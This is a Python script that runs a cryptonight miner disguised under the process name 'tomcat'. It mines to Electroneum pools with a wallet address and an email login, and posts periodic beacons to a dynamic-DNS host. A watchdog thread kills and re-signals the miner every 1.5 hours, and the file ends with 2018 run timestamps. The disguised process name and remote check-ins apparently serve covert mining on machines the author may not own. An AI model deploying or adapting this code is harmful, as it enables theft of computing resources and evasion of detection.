import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:08.372968
#2018-02-17 16:27:07.001861
#2018-02-17 18:16:03.428325
#2018-02-17 20:02:05.584387
#2018-02-17 21:50:06.620815
#2018-02-17 23:34:05.907079
#2018-02-18 01:23:07.216099
#2018-02-18 03:10:09.139295
#2018-02-18 04:57:05.640212
#2018-02-18 06:48:01.316933
#2018-02-18 08:36:07.545982
#2018-02-18 10:22:06.400214
#2018-02-18 12:08:05.380982
#2018-02-18 13:53:01.243160
#2018-02-18 15:44:02.240728
#2018-02-18 17:35:06.984910
#2018-02-18 19:23:01.726048
#2018-02-18 21:08:01.453170
#2018-02-18 22:55:05.544288
#2018-02-19 00:43:01.528071
#2018-02-19 02:29:05.546209
#2018-02-19 04:16:05.457412
#2018-02-19 05:59:06.679820
#2018-02-19 07:47:07.632545
#2018-02-19 09:37:01.876693
#2018-02-19 11:26:08.450716
#2018-02-19 13:13:08.614038
#2018-02-19 15:01:09.348840
#2018-02-19 16:49:01.671104
#2018-02-19 18:36:10.169575
#2018-02-19 20:21:03.718722
#2018-02-19 22:10:01.774219
#2018-02-19 23:55:05.197857
#2018-02-20 01:42:01.750542
#2018-02-20 03:29:07.761203
#2018-02-20 05:16:05.468104
#2018-02-20 06:58:04.576612
#2018-02-20 08:45:09.259745
#2018-02-20 10:29:05.585730
#2018-02-20 12:14:07.363136
#2018-02-20 14:02:05.033791
#2018-02-20 15:45:11.367308
#2018-02-20 17:32:08.465607
#2018-02-20 19:19:06.099598
#2018-02-20 21:07:03.545510
#2018-02-20 22:52:05.258466
#2018-02-21 00:36:01.868339
#2018-02-21 02:23:04.235330
#2018-02-21 04:09:04.632666
#2018-02-21 05:55:08.210422
#2018-02-21 07:45:07.848214
#2018-02-21 09:29:06.330055
#2018-02-21 11:18:08.231870
#2018-02-21 13:07:02.043509
#2018-02-21 14:55:05.612463
#2018-02-21 16:43:01.743101
#2018-02-21 18:32:04.802209
#2018-02-21 20:17:05.762749
#2018-02-21 22:06:02.007662
#2018-02-21 23:53:01.256299
#2018-02-22 01:43:08.093890
#2018-02-22 03:32:04.267469
#2018-02-22 05:19:01.772369
#2018-02-22 07:03:01.316303
#2018-02-22 08:49:05.663390
#2018-02-22 10:37:04.214402
#2018-02-22 12:23:07.728929
#2018-02-22 14:08:09.156369
#2018-02-22 15:55:06.826597
#2018-02-22 17:41:06.670188
#2018-02-22 19:28:06.833644
#2018-02-22 21:20:08.682350
#2018-02-22 23:05:04.256383
#2018-02-23 00:51:06.194037
#2018-02-23 02:38:05.171642
#2018-02-23 04:26:04.720401
#2018-02-23 06:11:04.751921
#2018-02-23 07:56:03.675273
#2018-02-23 09:52:05.674743
#2018-02-23 11:57:07.333166
#2018-02-23 13:46:04.653182
#2018-02-23 15:34:01.816881
#2018-02-23 17:22:05.471335
#2018-02-23 19:09:05.703734
#2018-02-23 20:54:01.558413
#2018-02-23 22:41:07.421025
#2018-02-24 00:27:06.879811
#2018-02-24 02:18:01.431918
#2018-02-24 04:07:05.382004
#2018-02-24 05:54:07.644937
#2018-02-24 07:42:04.764773
#2018-02-24 09:28:01.777195
#2018-02-24 11:22:04.516129
#2018-02-24 13:11:01.515474
#2018-02-24 15:00:09.458589
#2018-02-24 16:50:01.407768
#2018-02-24 18:38:07.085104
#2018-02-24 20:27:03.753739
#2018-02-24 22:23:04.884961
#2018-02-25 01:30:07.803913
#2018-02-25 05:11:07.519514
#2018-02-25 10:50:04.107382